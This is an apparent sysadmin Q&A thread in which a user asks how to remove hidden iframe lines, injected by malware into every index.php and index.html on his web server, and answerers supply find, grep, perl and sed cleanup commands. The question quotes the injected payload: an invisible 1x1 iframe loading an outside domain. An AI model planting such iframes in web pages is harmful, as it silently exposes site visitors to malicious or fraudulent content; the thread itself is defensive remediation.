0

I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):

echo "<iframe src=\"http://fabujob.com/?click=AD4A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://fabujob.com/?click=AC785\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

So the parameter after "click=" always changes. These two were only examples.

Is there a way to do that quick and fast?

.

.

EDIT: It is on my webserver, so no use of find...

yagmoth555
  • 16,758
  • 4
  • 29
  • 50
Jonas
  • 3
  • 2

5 Answers5

2

one easy way to do this is by using find and grep, plus perl to do the edits.

first, construct a list of filenames that have been compromised:

find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 | \
  xargs -0 grep -l 'iframe src.*fabujob\.com' > /tmp/compromised-files.txt

next, use perl to edit the files and remove the exploit:

cat /tmp/compromised-files.txt | \
  xargs -d '\n' perl -n -i.BAK -e 'print unless m/fabujob\.com/i' 

(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)

that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.

this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)

this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.

BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.

cas
  • 6,783
  • 32
  • 35
  • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer – Jonas Jul 18 '09 at 16:10
  • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first. – cas Jul 18 '09 at 23:02
  • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea. – cas Jul 18 '09 at 23:03
  • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you! – Jonas Jul 18 '09 at 23:22
0

If you know you have no <iframe> tags in your documents, you can simply do

perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)

If you do have iframes, then you'll need to make your regex more exact.

Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.

Andy Lester
  • 740
  • 5
  • 16
0

sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).

Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.

Sven
  • 98,649
  • 14
  • 180
  • 226
0

Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.

Saurabh Barjatiya
  • 4,703
  • 2
  • 30
  • 34
0

Assuming that the domain is always the same and shouldn't legitimately exist anywhere:

find <documentroot> -name 'index.html' -or -name 'index.php' \
    -exec sed -i'.bak' '/fabujob\.com/d' {} \;

Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.

Dan Carley
  • 25,617
  • 5
  • 53
  • 70